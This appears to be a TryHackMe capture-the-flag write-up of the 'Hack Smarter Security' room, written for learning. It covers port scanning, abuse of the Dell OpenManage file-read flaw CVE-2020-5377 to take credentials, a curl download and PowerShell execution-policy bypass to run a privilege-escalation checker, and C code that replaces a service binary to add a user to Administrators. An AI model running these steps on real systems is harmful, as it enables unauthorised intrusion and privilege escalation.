Hack Smarter Security | TryHackMe Write-up

Hey, I am back with another write-up. Try this room and many more at TryHackMe!!!

NMAP Scan

nmap scan

nmap [IP] -sV -T5

We get five open ports 21, 22, 80 ,1311 and 3389

PORT 21

Anonymous login was allowed and we found two files: 1 text file and 1 png

FTP

The text file contains some Credit card information

Credit-Cards-We-Pawned.txt

Port 80 and 1311

First Let’s look at Port 80

Port 80

Let’s try directory enum

gobuster on port 80

gobuster dir -u [URL] -w /path/to/wordlist

Nothing interesting was found there. Let’s try port 1311

port 1311

let’s switch to https://IP:1311

Great we are dealing with DELL EMC OPENMANAGE and have a login in front of us, but let’s take a look around first.

port 1311 with https

About (see footer) tells us that we are dealing with version 9.4.0.2.

About

Exploit

Found the exploit CVE-2020–5377 at exploit-db.

Take a look at this post to learn more about the vulnerability.

exploit-db script was not working so tried this script.

We are now able to retrieve files on the system. We start with C:\Windows\win.ini. A file that is available and accessible on every Windows system. This allows us to test whether the exploit actually works or not. We know that RDP and SSH are accessible(see Nmap scan), so we are looking for credentials.

A good place for these is usually the web.config of the IIS. We can find the config at
C:\inetpub\wwwroot\application\web.config. We know from our Nmap scan that the HTTP title corresponds to the domain name. Possibly this is the application name. When we call up \inetpub\wwwroot\hacksmartersec\web.config, we get its content and thus the credentials for the user Tyler.

running CVE-2020–5377

we were able to enter via ssh

ssh to Tyler

we looked for user.txt and found that

user.txt

We will use this https://github.com/itm4n/PrivescCheck
We can open http server as below on our system

python2 -m SimpleHTTPServer 1234

and curl the script on machine.

curl http://10.9.1.214:1234/PrivescCheck.ps1 -o PrivescCheck.ps1

use the below cmd to run the script. It will take some time to run the script.

powershell -ep bypass -c “. .\PrivescCheck.ps1; Invoke-PrivescCheck”

running PrivesCheck.ps1

We find a very likely vulnerability, rated as high. The spoofer-scheduler service can be started and stopped by a normal user. The service runs under the LocalSystem. If we now replace the executable of the service, e.g. with a reverse shell or an executable that creates an admin account for us, we can escalate our privileges.

spoofer-schedule vuln

We confirm that we can write to C:\Program Files(x86)\Spoofer. We now need a reverse shell executable that is not recognized by Windows Defender. A simple msfvenom payload gets easily detected and deleted.

writing in C:\Program Files(x86)\Spoofer

Instead, I chose to create an executable that will add the Tyler user to the Administrators local group.

Writing a very simple C code that does this.

#include <stdlib.h>
int main() {

system(“cmd.exe /c net localgroup Administrators tyler /add”);

return 0;

}

Now Compiling it into an executable for Windows.

x86_64-w64-mingw32-gcc-win32 payload.c -o payload.exe

Now we will stop the scheduler

sc stop spoofer-scheduler

sc stop spoofer-scheduler

Now we will rename the original exe and upload our exe and execute it.

executing payload

After a re-login, i was part of the administrator group

I am admin

We were able to read Hacking-targets.txt

Hacking-Targets.txt

The room was nice I enjoyed doing this room

Happy Hacking!